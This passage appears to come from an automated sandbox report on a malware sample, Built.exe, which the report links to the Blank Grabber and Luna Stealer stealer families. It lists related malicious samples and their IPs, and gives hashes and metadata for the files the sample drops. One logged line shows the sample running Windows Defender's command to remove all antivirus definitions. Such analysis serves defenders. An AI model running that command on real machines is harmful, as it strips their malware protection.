                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            Sara.exe.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            2N7MHjWNns.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            202411070105F02558.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            RFQ500005576.jsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            T4tTl6dxyD.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            m08H8HhpXN.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            AMAZON-02USla.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 34.249.145.219
                                                                                                                                                                                                                            yakuza.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 3.135.130.56
                                                                                                                                                                                                                            yakuza.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 18.138.65.188
                                                                                                                                                                                                                            yakuza.arm4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 52.199.99.11
                                                                                                                                                                                                                            la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 54.171.230.55
                                                                                                                                                                                                                            shindeVi686.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 34.249.145.219
                                                                                                                                                                                                                            shindeVx86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 54.217.10.153
                                                                                                                                                                                                                            shindeVarm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 54.171.230.55
                                                                                                                                                                                                                            botnet.sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                            • 108.157.7.31
                                                                                                                                                                                                                            botnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                            • 34.213.8.129
                                                                                                                                                                                                                            No context
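Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\_MEI27602\VCRUNTIME140.dll | Built.exe | malicious | Blank Grabber
C:\Users\user\AppData\Local\Temp\_MEI27602\VCRUNTIME140.dll | windows update.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\_MEI27602\VCRUNTIME140.dll | w32e.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\_MEI27602\VCRUNTIME140.dll | 3ORCHAMYoz.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\_MEI27602\VCRUNTIME140.dll | yuki.exe | malicious | Luna Stealer
C:\Users\user\AppData\Local\Temp\_MEI27602\VCRUNTIME140.dll | CIEfSpAIUS.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\_MEI27602\VCRUNTIME140.dll | iu56HJ45NV.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\_MEI27602\VCRUNTIME140.dll | Discord_SiteLink.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\_MEI27602\VCRUNTIME140.dll | client11.png.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\_MEI27602\VCRUNTIME140.dll | PCuK01wybv.exe | malicious | Blank Grabber
C:\Users\user\AppData\Local\Temp\_MEI27602\_bz2.pyd | Built.exe | malicious | Blank Grabber
C:\Users\user\AppData\Local\Temp\_MEI27602\_bz2.pyd | PCuK01wybv.exe | malicious | Blank Grabber
C:\Users\user\AppData\Local\Temp\_MEI27602\_bz2.pyd | SecuriteInfo.com.Python.Packed.59.10217.7860.exe | malicious | Blank Grabber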
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                      Size (bytes):64
                                                                                                                                                                                                                                                      Entropy (8bit):1.1940658735648508
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Nlllulbnolz:NllUc
                                                                                                                                                                                                                                                      MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                                                                                                                                                                                                      SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                                                                                                                                                                                                      SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                                                                                                                                                                                                      SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:@...e................................................@..........
                                                                                                                                                                                                                                                      Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                      Size (bytes):894
                                                                                                                                                                                                                                                      Entropy (8bit):3.104740744385702
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:Q58KRBubdpkoPAGdjrZrbk9+MlWlLehW51IC4r2:QOaqdmOFdjrFQ+kWResLI92
                                                                                                                                                                                                                                                      MD5:6F8ADD90BAD02A282532DAECF77345EC
                                                                                                                                                                                                                                                      SHA1:F809AFB42EC6DEAC6D4F59A01C07A351234D70E6
                                                                                                                                                                                                                                                      SHA-256:1357C1151126E1B4AF25D66398196F51A0D30A10BA2CE265877A6FDABD3941B3
                                                                                                                                                                                                                                                      SHA-512:E84A2F25FCDFCEE2ABDC94B7C88ABC905A5E06060C94FC4DFC6D3225C18D42B715A46FE8724C159A8D792172F50115DFA47E1A1E49D1A6D24469CF17342E6940
                                                                                                                                                                                                                                                      Malicious:false
Preview:
MpCmdRun: Command Line: "C:\Program Files\Windows Defender\MpCmdRun.exe"  -RemoveDefinitions -All
 Start Time: Sun Nov 10 2024 11:02:30
MpEnsureProcessMitigationPolicy: hr = 0x1
Start: MpRemoveDefinitions(1)
MpCmdRun: End Time: Sun Nov 10 2024 11:02:30
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Built.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):119192
                                                                                                                                                                                                                                                      Entropy (8bit):6.6016214745004635
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:+qvQ1Dj2DkX7OcujarvmdlYNABCmgrP4ddbkZIecbWcFML/UXzlghzdMFw84hzk:+qvQ1D2CreiABCmgYecbWVLUD6h+b4ho
                                                                                                                                                                                                                                                      MD5:BE8DBE2DC77EBE7F88F910C61AEC691A
                                                                                                                                                                                                                                                      SHA1:A19F08BB2B1C1DE5BB61DAF9F2304531321E0E40
                                                                                                                                                                                                                                                      SHA-256:4D292623516F65C80482081E62D5DADB759DC16E851DE5DB24C3CBB57B87DB83
                                                                                                                                                                                                                                                      SHA-512:0DA644472B374F1DA449A06623983D0477405B5229E386ACCADB154B43B8B083EE89F07C3F04D2C0C7501EAD99AD95AECAA5873FF34C5EEB833285B598D5A655
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Joe Sandbox View:
• Filename: Built.exe, Detection: malicious
• Filename: windows update.exe, Detection: malicious
• Filename: w32e.exe, Detection: malicious
• Filename: 3ORCHAMYoz.exe, Detection: malicious
• Filename: yuki.exe, Detection: malicious
• Filename: CIEfSpAIUS.exe, Detection: malicious
• Filename: iu56HJ45NV.exe, Detection: malicious
• Filename: Discord_SiteLink.exe, Detection: malicious
• Filename: client11.png.exe, Detection: malicious
• Filename: PCuK01wybv.exe, Detection: malicious
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Built.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):49944
                                                                                                                                                                                                                                                      Entropy (8bit):7.794461012406033
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:tA0qhtL6ugh0BoGmZ0zlTUjZomYtgHQmchmz1NqRR0opjsIMCVy0I5YiSyvFAMx7:tAX76ZKBT+jjvQlRnsIMCVyH7SyVx7
                                                                                                                                                                                                                                                      MD5:ADAA3E7AB77129BBC4ED3D9C4ADEE584
                                                                                                                                                                                                                                                      SHA1:21AABD32B9CBFE0161539454138A43D5DBC73B65
                                                                                                                                                                                                                                                      SHA-256:A1D8CE2C1EFAA854BB0F9DF43EBCCF861DED6F8AFB83C9A8B881904906359F55
                                                                                                                                                                                                                                                      SHA-512:B73D3ABA135FB5E0D907D430266754DA2F02E714264CD4A33C1BFDEDA4740BBE82D43056F1A7A85F4A8ED28CB7798693512B6D4CDB899CE65B6D271CF5E5E264
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                                                                                      • Filename: Built.exe, Detection: malicious
                                                                                                                                                                                                                                                      • Filename: PCuK01wybv.exe, Detection: malicious
                                                                                                                                                                                                                                                      • Filename: SecuriteInfo.com.Python.Packed.59.10217.7860.exe, Detection: malicious
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Built.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):60696
                                                                                                                                                                                                                                                      Entropy (8bit):7.838921842803249
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:XGd2xRPNLaGFQFjd9MuCRL5o1kGIMLPSj7SyKxw:WMxVhFyjd9MDmtIMLPSjr
                                                                                                                                                                                                                                                      MD5:0F090D4159937400DB90F1512FDA50C8
                                                                                                                                                                                                                                                      SHA1:01CBCB413E50F3C204901DFF7171998792133583
                                                                                                                                                                                                                                                      SHA-256:AE6512A770673E268554363F2D1D2A202D0A337BAF233C3E63335026D223BE31
                                                                                                                                                                                                                                                      SHA-512:151156A28D023CF68FD38CBECBE1484FC3F6BF525E7354FCCED294F8E479E07453FD3FC22A6B8D049DDF0AD6306D2C7051ECE4E7DE1137578541A9AABEFE3F12
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Built.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):110360
                                                                                                                                                                                                                                                      Entropy (8bit):7.933674633852228
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3072:ATZr2oqnOtykg54lBjYOI6T+62Mnaf9KLKuV8obLFWaIMOqM7ZdD:qonr9SlB0vsNfaluLH/8/7XD
                                                                                                                                                                                                                                                      MD5:A592BA2BB04F53B47D87B4F7B0C8B328
                                                                                                                                                                                                                                                      SHA1:CA8C65AB0AAB0F98AF8CC1C1CF31C9744E56A33C
                                                                                                                                                                                                                                                      SHA-256:19FE4A08B0B321FF9413DA88E519F4A4A4510481605B250F2906A32E8BB14938
                                                                                                                                                                                                                                                      SHA-512:1576FDC90D8678DA0DAB8253FDD8EC8B3CE924FA392F35D8C62207A85C31C26DAE5524E983E97872933538551CBEF9CD4BA9206BCD16F2AE0858AB11574D09E0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Built.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):36632
                                                                                                                                                                                                                                                      Entropy (8bit):7.673459345767737
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:9ZxZoP6y3dGOWmmDFYCppejnIMOInQ5YiSyvqAMxkEq:91jOWpDFujnIMOInC7SyAx2
                                                                                                                                                                                                                                                      MD5:4DD4C7D3A7B954A337607B8B8C4A21D1
                                                                                                                                                                                                                                                      SHA1:B6318B830D73CBF9FA45BE2915F852B5A5D81906
                                                                                                                                                                                                                                                      SHA-256:926692FCECDB7E65A14AC0786E1F58E880EA8DAE7F7BB3AA7F2C758C23F2AF70
                                                                                                                                                                                                                                                      SHA-512:DAB02496C066A70A98334E841A0164DF1A6E72E890CE66BE440B10FDEECDFE7B8D0EC39D1AF402AE72C8AA19763C92DD7404F3A829C9FDCF871C01B1AED122E1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Built.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):88344
                                                                                                                                                                                                                                                      Entropy (8bit):7.925386593593091
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:IGMIb+tRn8VHPoUBL9ZEL7qzf7+pW4AHjI1xh4hBpOVIMZ1JM7Syqxy:oWgRsHPoUVwqzf7+mHjWxGUIMZ1JML
                                                                                                                                                                                                                                                      MD5:17082C94B383BCA187EB13487425EC2C
                                                                                                                                                                                                                                                      SHA1:517DF08AF5C283CA08B7545B446C6C2309F45B8B
                                                                                                                                                                                                                                                      SHA-256:DDBFEF8DA4A0D8C1C8C24D171DE65B9F4069E2EDB8F33EF5DFECF93CB2643BD4
                                                                                                                                                                                                                                                      SHA-512:2B565D595E9A95AEFAE396FC7D66EE0AEB9BFE3C23D64540BA080BA39A484AB1C50F040161896CCA6620C182F0B02A9DB677DAB099DCA3CAE863E6E2542BB12C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Built.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):26904
                                                                                                                                                                                                                                                      Entropy (8bit):7.472682734205639
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:pX+wITsyt4xW6MwmTMp5HIMQUnH5YiSyvMcAMxkEm2j:Mj4z7YqHIMQUnZ7SyVxb
                                                                                                                                                                                                                                                      MD5:97CC5797405F90B20927E29867BC3C4F
                                                                                                                                                                                                                                                      SHA1:A2E7D2399CCA252CC54FC1609621D441DFF1ACE5
                                                                                                                                                                                                                                                      SHA-256:FB304CA68B41E573713ABB012196EF1AE2D5B5E659D846BBF46B1F13946C2A39
                                                                                                                                                                                                                                                      SHA-512:77780FE0951473762990CBEF056B3BBA36CDA9299B1A7D31D9059A792F13B1A072CE3AB26D312C59805A7A2E9773B7300B406FD3AF5E2D1270676A7862B9CA48
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Built.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):45336
                                                                                                                                                                                                                                                      Entropy (8bit):7.718752299192271
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:zN6akbHvkpgRFeTWraC7I5ubIFpoO5IMLwyBu5YiSyvYEAMxkEIWN:z8akHrRFeTWrdI5uMoO5IMLwyBE7Sygs
                                                                                                                                                                                                                                                      MD5:F52C1C015FB147729A7CAAB03B2F64F4
                                                                                                                                                                                                                                                      SHA1:8AEBC2B18A02F1C6C7494271F7F9E779014BEE31
                                                                                                                                                                                                                                                      SHA-256:06D91AC02B00A29180F4520521DE2F7DE2593DD9C52E1C2B294E717C826A1B7D
                                                                                                                                                                                                                                                      SHA-512:8AB076C551F0A6FFE02C26B4F0FBB2EA7756D4650FE39F53D7BD61F4CB6AE81460D46D8535C89C6D626E7C605882B39843F7F70DD50E9DAF27AF0F8CADD49C0F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Built.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):59160
                                                                                                                                                                                                                                                      Entropy (8bit):7.857087754447377
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:f063sNIsNgSIOB2nMCbGV5SQpvX8Fyi6sdSIMOQif7SyJxl:fLHr4VD7dv8r6s0IMOQif3
                                                                                                                                                                                                                                                      MD5:37A88A19BB1DE9CF33141872C2C534CB
                                                                                                                                                                                                                                                      SHA1:A9209EC10AF81913D9FD1D0DD6F1890D275617E8
                                                                                                                                                                                                                                                      SHA-256:CCA0FBE5268AB181BF8AFBDC4AF258D0FBD819317A78DDD1F58BEF7D2F197350
                                                                                                                                                                                                                                                      SHA-512:3A22064505B80B51EBAA0D534F17431F9449C8F2B155EC794F9C4F5508470576366ED3BA5D2DE7DDF1836C6E638F26CAD8CB0CC496DAF30EE38CA97557238733
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Built.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):67864
                                                                                                                                                                                                                                                      Entropy (8bit):7.8470211975704105
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:BzC9S4THQvkF5SM7f8bQMAjsNVw3daUjNIMC7Z1s7SyS6xT:BspTRf8ejsNWRIMC7ZSD
                                                                                                                                                                                                                                                      MD5:34402EFC9A34B91768CF1280CC846C77
                                                                                                                                                                                                                                                      SHA1:20553A06FE807C274B0228EC6A6A49A11EC8B7C1
                                                                                                                                                                                                                                                      SHA-256:FE52C34028C5D62430EA7A9BE034557CCFECDDDDA9C57874F2832F584FEDB031
                                                                                                                                                                                                                                                      SHA-512:2B8A50F67B5D29DB3E300BC0DD670DAD0BA069AFA9ACF566CAD03B8A993A0E49F1E28059737D3B21CEF2321A13EFF12249C80FA46832939D2BF6D8555490E99C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Built.exe
                                                                                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1332808
                                                                                                                                                                                                                                                      Entropy (8bit):5.586991005048339
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12288:rclJGUq/aLmn9vc+fYNXPh26UZWAzbX7jg/yquPxQh/dmFP/H71dlt/RO2/HUQ:rclJGUza9zb/gXOQ/dmFPvL3g2/HUQ
                                                                                                                                                                                                                                                      MD5:21BF7B131747990A41B9F8759C119302
                                                                                                                                                                                                                                                      SHA1:70D4DA24B4C5A12763864BF06EBD4295C16092D9
                                                                                                                                                                                                                                                      SHA-256:F36454A982F5665D4E7FCC69EE81146965358FCB7F5D59F2CD8861CA89C66EFA
                                                                                                                                                                                                                                                      SHA-512:4CB45E9C48D4544C1A171D88581F857D8C5CF74E273BB2ACF40A50A35C5148FE7D6E9AFCF5E1046A7D7AE77F9196F7308AE3869C18D813FCD48021B4D112DEB5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Built.exe
                                                                                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):114183
                                                                                                                                                                                                                                                      Entropy (8bit):7.7316094706626055
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:j9JWMe9V1quXf8klMY1qlTGuvyshFfRylZcYDQLdE3xiMUEDmzxuaaLhbw4equL7:XCA0bNgLX5IKEPszxuaalUpqnhVFq
                                                                                                                                                                                                                                                      MD5:199E82F01D57DFEC6DED77B4AF09D9DC
                                                                                                                                                                                                                                                      SHA1:98D48C1AF042E2D9EE1FFAF3C479ED156CCE7739
                                                                                                                                                                                                                                                      SHA-256:4BC7A6F6F517EDE6FE3032E6CF05B8EA7187847FF4C55FA12320BCACDC899378
                                                                                                                                                                                                                                                      SHA-512:A18B384DE5ABC1329237E518E005EFA859CA47025CA78A6720F2E6566F22A4943DAE689955C0029FE525C360E0D7B4CBAA05C30AACB375D8E7E8C201BB07E281
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Built.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1630488
                                                                                                                                                                                                                                                      Entropy (8bit):7.952879310777133
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:49152:f3Y7UGnm3dtF6Q5xkI61CPwDvt3uFlDCm:/Y7Bm3dz6Q5c1CPwDvt3uFlDCm
                                                                                                                                                                                                                                                      MD5:8377FE5949527DD7BE7B827CB1FFD324
                                                                                                                                                                                                                                                      SHA1:AA483A875CB06A86A371829372980D772FDA2BF9
                                                                                                                                                                                                                                                      SHA-256:88E8AA1C816E9F03A3B589C7028319EF456F72ADB86C9DDCA346258B6B30402D
                                                                                                                                                                                                                                                      SHA-512:C59D0CBE8A1C64F2C18B5E2B1F49705D079A2259378A1F95F7A368415A2DC3116E0C3C731E9ABFA626D12C02B9E0D72C98C1F91A359F5486133478144FA7F5F7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Built.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):29968
                                                                                                                                                                                                                                                      Entropy (8bit):7.677818197322094
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
                                                                                                                                                                                                                                                      MD5:08B000C3D990BC018FCB91A1E175E06E
                                                                                                                                                                                                                                                      SHA1:BD0CE09BB3414D11C91316113C2BECFFF0862D0D
                                                                                                                                                                                                                                                      SHA-256:135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
                                                                                                                                                                                                                                                      SHA-512:8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Built.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):227096
                                                                                                                                                                                                                                                      Entropy (8bit):7.928768674438361
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6144:PpEswYxCQyTp2Z/3YUtoQe5efEw+OXDbM3nFLQdFM4mNJQ:PpAqo92h3Y660Ew+OTbAFLQd2lw
                                                                                                                                                                                                                                                      MD5:B2E766F5CF6F9D4DCBE8537BC5BDED2F
                                                                                                                                                                                                                                                      SHA1:331269521CE1AB76799E69E9AE1C3B565A838574
                                                                                                                                                                                                                                                      SHA-256:3CC6828E7047C6A7EFF517AA434403EA42128C8595BF44126765B38200B87CE4
                                                                                                                                                                                                                                                      SHA-512:5233C8230497AADB9393C3EE5049E4AB99766A68F82091FE32393EE980887EBD4503BF88847C462C40C3FC786F8D179DAC5CB343B980944ADE43BC6646F5AD5A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Built.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1808664
                                                                                                                                                                                                                                                      Entropy (8bit):7.993757523155339
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:24576:xKveD1e+vwrto8RBt0I7Y2OCQNGucXFIRJQmThODxHtSRi+++q+nSWACTpoYqtOU:e+vyhC+vgNGtUth6SRijWAdY7bpX/YCy
                                                                                                                                                                                                                                                      MD5:6F7C42579F6C2B45FE866747127AEF09
                                                                                                                                                                                                                                                      SHA1:B9487372FE3ED61022E52CC8DBD37E6640E87723
                                                                                                                                                                                                                                                      SHA-256:07642B6A3D99CE88CFF790087AC4E2BA0B2DA1100CF1897F36E096427B580EE5
                                                                                                                                                                                                                                                      SHA-512:AADF06FD6B4E14F600B0A614001B8C31E42D71801ADEC7C9C177DCBB4956E27617FA45BA477260A7E06D2CA4979ED5ACC60311258427EE085E8025B61452ACEC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Built.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):630736
                                                                                                                                                                                                                                                      Entropy (8bit):6.409476333013752
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
                                                                                                                                                                                                                                                      MD5:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                                                      SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
                                                                                                                                                                                                                                                      SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
                                                                                                                                                                                                                                                      SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Built.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):456
                                                                                                                                                                                                                                                      Entropy (8bit):4.447296373872587
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
                                                                                                                                                                                                                                                      MD5:4531984CAD7DACF24C086830068C4ABE
                                                                                                                                                                                                                                                      SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
                                                                                                                                                                                                                                                      SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
